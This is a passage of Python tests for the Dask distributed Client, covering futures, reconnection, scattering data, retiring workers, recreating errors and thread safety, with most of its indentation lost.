wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_test()
async def test_status():
s = await Scheduler(port=0)
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
await s.close()
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(tokey, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(tokey(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli) as s:
c = Client("127.0.0.1:9393", loop=loop)
start = time()
while len(c.nthreads()) != 1:
sleep(0.1)
assert time() < start + 3
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while c.status != "connecting":
assert time() < start + 5
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result()
with popen(scheduler_cli) as s:
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 5
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 15
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while True:
try:
x.result()
assert False
except CommClosedError:
continue
except CancelledError:
break
assert time() < start + 5
sleep(0.1)
sync(loop, w.close)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
start = time()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
assert time() < start + 5, "Timeout waiting for reconnect to fail"
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.skipif(sys.version_info < (3, 7), reason="TODO: intermittent failures")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == "closed"
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
assert time() < start + 10
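# Submitting the same key from a second client should be a no-op on the
# scheduler: the transition log must not grow beyond a single submission.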
@gen_cluster(client=False, timeout=None)
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
# smoke test: asking for the versions of specific packages should not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
start = time()
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
assert time() < start + 2
xxkey = xx.key
del xx
start = time()
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster(client=False)
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert tokey(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster(client=False)
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
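# Client.as_current() must be thread-local: two threads entering different
# clients' contexts concurrently should each see their own client from
# Client.current().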
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s.address) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s.address) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@pytest.mark.xfail(
sys.version_info < (3, 7),
reason="Python 3.6 contextvars are not copied on Task creation",
)
@gen_cluster(client=False)
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers={
tuple(L1): a.address,
total: b.address,
tuple(L2): [c.address],
total2: b.address,
},
allow_other_workers=L2 + [total2],
)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers={tuple(L1): a.address, total: b.address, tuple(L2): [c.address]},
allow_other_workers=L1 + [total],
)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
def test_get_restrictions():
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
r1, loose = Client.get_restrictions(L2, "127.0.0.1", False)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert not loose
r1, loose = Client.get_restrictions(L2, ["127.0.0.1"], True)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert set(loose) == {d.key for d in L2}
r1, loose = Client.get_restrictions(L2, {total: "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
r1, loose = Client.get_restrictions(L2, {(total,): "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
t = time()
while len(S) < 4 and time() - t < 2.0:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
c = Client("127.0.0.1:57484", asynchronous=True)
s = Scheduler(loop=c.loop, port=57484)
await asyncio.sleep(4)
try:
await s
except EnvironmentError: # port in use
await c.close()
return
start = time()
await c
try:
assert time() < start + 2
finally:
await c.close()
await s.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
start = time()
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_get_future_error_simple(c, s, a, b):
f = c.submit(div, 1, 0)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
# args contains concrete values, not task keys
assert function.__name__ == "div"
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_get_futures_error(c, s, a, b):
x0 = delayed(dec)(2, dask_key_name="x0")
y0 = delayed(dec)(1, dask_key_name="y0")
x = delayed(div)(1, x0, dask_key_name="x")
y = delayed(div)(1, y0, dask_key_name="y")
tot = delayed(sum)(x, y, dask_key_name="tot")
f = c.compute(tot)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
assert function.__name__ == "div"
assert args == (1, y0.key)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
function, args, kwargs = await c._recreate_error_locally(df3)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
func, args, kwargs = await c._recreate_error_locally(zz)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
start = time()
while a.status != "closed":
await asyncio.sleep(0.01)
assert time() < start + 5
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
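# fire_and_forget() should keep a task running even though no client holds a
# reference to it, and the scheduler should forget it once it completes.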
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
start = time()
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert time() < start + 2
assert distributed.foo == 123
finally:
del distributed.foo
start = time()
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert time() < start + 2
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(loop=loop, processes=False, threads_per_worker=4) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
start = time()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(30) as e:
        results = list(e.map(f, range(30)))
    assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
